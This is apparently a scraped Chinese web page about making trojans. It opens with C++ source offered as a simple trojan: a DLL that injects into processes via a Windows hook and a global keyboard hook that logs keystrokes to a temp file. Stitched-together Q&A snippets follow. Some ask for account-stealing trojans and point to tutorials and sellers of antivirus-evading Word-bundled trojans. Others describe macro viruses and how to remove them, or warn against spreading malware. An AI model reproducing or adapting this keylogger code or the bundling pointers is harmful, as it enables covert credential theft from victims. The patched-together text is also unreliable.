一个简单的vc++6.0下的木马源码 木马源程序,包括客户端和服务端PCSshare的客户端代码:
#include "stdafx.h"
#include "SshWork.h"
#pragma data_seg("Shared")
char m_CharFileName[256] = {0};
HHOOK g_hook = NULL;
HHOOK g_khook = NULL;
INITDLLINFO m_InitInfo = {0};
BOOL m_IsOk = FALSE;
#pragma data_seg()
#pragma comment(linker,"/section:Shared,rws")
HINSTANCE ghInstance = NULL;
SshWork m_Work;
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
case DLL_PROCESS_ATTACH:
ghInstance = (HINSTANCE) hModule;
break;
default : break;
}
return TRUE;
}
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)
{
LRESULT lResult = CallNextHookEx(g_hook, nCode, wParam, lParam);
//查看是否为指定进程
if(!m_IsOk && m_InitInfo.m_ProcessId == GetCurrentProcessId())
{
//找到指定进程取消hook
m_IsOk = TRUE;
if(g_hook) UnhookWindowsHookEx(g_hook);
//通知主进程退出
HANDLE m_WaitEvent =
OpenEvent(EVENT_ALL_ACCESS,FALSE,
m_InitInfo.m_EventName);
if(m_WaitEvent)
{
SetEvent(m_WaitEvent);
CloseHandle(m_WaitEvent);
}
Sleep(1000);
//装载DLL到进程
m_Work.m_Module = LoadLibrary(m_InitInfo.m_StartFile);
if(m_Work.m_Module)
{
m_Work.StartWork(&m_InitInfo);
}
}
return lResult;
}
BOOL PlayWork(LPINITDLLINFO pInitInfo)
{
//拷贝数据
memcpy(&m_InitInfo,pInitInfo,sizeof(INITDLLINFO));
//自进程启动
if(pInitInfo->m_ProcessName[0] == 2)
{
m_Work.StartWork(&m_InitInfo);
return TRUE;
}
//检查是否已经启动
if(g_hook != NULL) return FALSE;
//启动HOOK
g_hook = SetWindowsHookEx(WH_DEBUG, GetMsgProc, ghInstance, 0);
return (g_hook != NULL);
}
void WriteChar(char* sText)
{
//加锁
HANDLE hMetux = OpenMutex(MUTEX_ALL_ACCESS, FALSE, "PsKey400");
if(hMetux != NULL)
WaitForSingleObject(hMetux, 300);
FILE* fp = fopen(m_CharFileName,"ab");
if(fp != NULL)
{
fwrite(sText,strlen(sText),1,fp);
fclose(fp);
}
//取锁
if(hMetux != NULL)
{
ReleaseMutex(hMetux);
CloseHandle(hMetux);
}
}
LRESULT WINAPI GetKeyMsgProc(int nCode, WPARAM wParam, LPARAM lParam)
{
LRESULT lResult = CallNextHookEx(g_khook, nCode, wParam, lParam);
char key[10] = {0};
BYTE buffer[256] = {0};
WORD m_wchar = 0;
UINT m_scan = 0;
if ((lParam & 0x40000000) && (nCode == HC_ACTION))
{
if ((wParam==VK_SPACE)||(wParam==VK_RETURN)||(wParam>= 0x2f ) &&(wParam<= 0x100))
{
if (wParam == VK_RETURN)
{
WriteChar("\r\n");
}
else
{
GetKeyboardState(buffer);
m_scan = 0;
ToAscii(wParam,m_scan,buffer , &m_wchar,0);
key[0] = m_wchar%255;
if(key[0] >= 32 && key[0] <= 126)
WriteChar(key);
}
}
}
return lResult;
}
BOOL KeyStartMyWork()
{
if(g_khook != NULL) return FALSE;
GetTempPath(200,m_CharFileName);
strcat(m_CharFileName,"pskey.dat");
g_khook = SetWindowsHookEx(WH_KEYBOARD,GetKeyMsgProc,ghInstance,0);
return (g_khook != NULL);
}
void KeyStopMyWork()
{
if(g_khook != NULL) UnhookWindowsHookEx(g_khook);
}
怎样制作盗号木马
采纳我给你发教程更多
会用word就能做了
摆脱
看在采纳我的份上就和你唠唠,首先,你想做木马得从vb语言起,连c语言编程全要学到精通,并且研究你要盗号软件的程序语言,从上万句语句中找到漏洞,将你的木马语言植入人家程序,相当于你和无数编程高手组成的团队博弈,觉得智商不够就只能花钱去买现成的木马。这个故事告诉我们,没有天上掉馅饼的事,这个社会只认实力或者金钱。否则就是你这种幻想着不劳而获的傻子。本来你这想盗号的心态就是想不劳而获,在我这也就损失点财富值,再白日做梦,不是喝西北风就是被打断腿,好自为之!
WORD文件会不会有病毒?
word文件可感染word宏病毒。
Word宏病毒是一些制作病毒的专业人员利用MICROSOFTWord的开放性即Word中提供的WordBASIC编程接口,专门制作的一个或多个具有病毒特点的宏的集合,这种病毒宏的集合影响到计算机使用,并能通过DOC文档及DOT模板进行自我复制及传播。
宏病毒的特点:
1、传播极快 :
Word宏病毒通过DOC文档及DOT模板进行自我复制及传播,而计算机文档是交流最广的文件类型。多年来,人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染,而对外来的文档文件基本是直接浏览使用,这给Word宏病毒传播带来很多便利。特别是Internet网络的普及,E-mail的大量应用更为Word宏病毒传播铺平道路;
2、制作、变种方便 :
Word使用宏语言WordBasic来编写宏指令。宏病毒同样用WordBasic来编写;
目前,世界上的宏病毒原型已有几十种,其变种与日骤增,追究其原因还是Word的开放性所致。现在的Word病毒都是用WordBasic语言所写成,大部分Word病毒宏并没有使用Word提供的Execute—Only处理函数处理,它们仍处于可打开阅读修改状态。
所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。当然会有“不法之徒”利用掌握的Basic语句把其中病毒激活条件和破坏条件加以改变,立即就生产出了一种新的宏病毒,甚至比原病毒的危害更加严重;
3、破坏可能性极大:
鉴于宏病毒用WordBasic语言编写,WordBasic语言提供了许多系统级底层调用,如直接使用DOS系统命令,调用WindowsAPI,调用DDE、DLL等。这些操作均可能对系统直接构成威胁,而Word在指令安全性完整性上检测能力很弱,破坏系统的指令很容易被执行。宏病毒Nuclear就是破坏操作系统的典型一例。
根据宏病毒的传染机制,不难看出宏病毒传染中的特点,所以发现宏病毒可以通过以下步聚进行:
1、在自己使用的Word中打开工具中的宏菜单,点中通用(Normal)模板,若发现有“AutoOpen”等自动宏,“FileSave”等文件操作宏或一些怪名字的宏,而自己又没有加载特殊模板,这就有可能有病毒了。因为大多数用户的通用(Normal)模板中是没有宏的;
2、如发现打开一个文档,它未经任何改动,立即就有存盘操作,也有可能是Word带有病毒;
3、打开以DOC为后缀的文件在另存菜单中只能以模板方式存盘而此时通用模板中含有宏,也有可能是Word有病毒。
手工清除宏病毒的方法:
1、打开宏菜单,在通用模板中删除您认为是病毒的宏;
2、打开带有病毒宏的文档(模板),然后打开宏菜单,在通用模板和病毒文件名模板中删除您认为是病毒的宏;
3、保存清洁文档。
手工清除病毒总是比较烦琐而且不要靠,用杀毒工具自动清除宏病毒是理想的解决办法。
请问怎么分离office 2003 word中捆绑的木马EXE?
22前几天不是有黑客站发布了“免杀word木马制作到挂马”这个教程吗?里面用的word捆绑器就可以做出doc后缀的木马来
word木马哪里有出售
前几天不是有黑客站发布了“免杀word木马制作到挂马”这个教程吗?里面用的word捆绑器就可以做出doc后缀的木马来
求获取木马制作者信息的软件
运行它,用winhex来截获内存,将对应木马的进程名打开,用软件的“查找”找出SMTP的字段,一般来说,盗取者的邮箱帐号和密码都在那个区域里显现出来。
求最新的word捆绑器木马,也就是doc捆绑器,要后缀是.doc的木马
现在不是刚爆出一个微软的漏洞吗?你可以看这个教程“2010年最新Word捆绑器(Doc木马)制作到挂马”百度找下,有下载的我朋友买过,效果很好,不过我自己不用,不干那些事
txt病毒制作教程全程带图(要Word2007的方法)
您好,请不要传播病毒、盗号木马程序,恶意传播病毒和木马会污染互联网环境,请您加入到维护网络安全的大军中!
QQ木马程序会导致您和他人的帐号和密码泄露,从而可能使您和他人的QQ财产,如游戏、QB等受到严重威胁,严重的还会违反法律。
请您不要轻易安装陌生人传送给您的未知文件,有可能是病毒或者木马。建议您安装腾讯电脑管家对您的电脑进行实时防护,保护您的电脑安全运行,避免给您的财产和个人隐私带来威胁。
电脑管家中总计四大反病毒引擎:分别是腾讯电脑管家云引擎、金山云查杀、小红伞本地查杀引擎、趋势本地引擎。腾讯电脑管家是腾讯公司出品的永久免费专业安全软件, 杀毒+管理二合一杀毒版集“专业病毒查杀、智能软件管理、系统安全防护”于一身,开创了“杀毒 + 管理”2合1的创新模式,先后通过VB100等四大权威测试,杀毒实力跻身全球第一阵营。
希望可以帮到您,望采纳。
腾讯电脑管家企业平台:http://zhidao.baidu.com/c/guanjia/
转载请注明出处51数据库 » word木马制作 怎么制作简单木马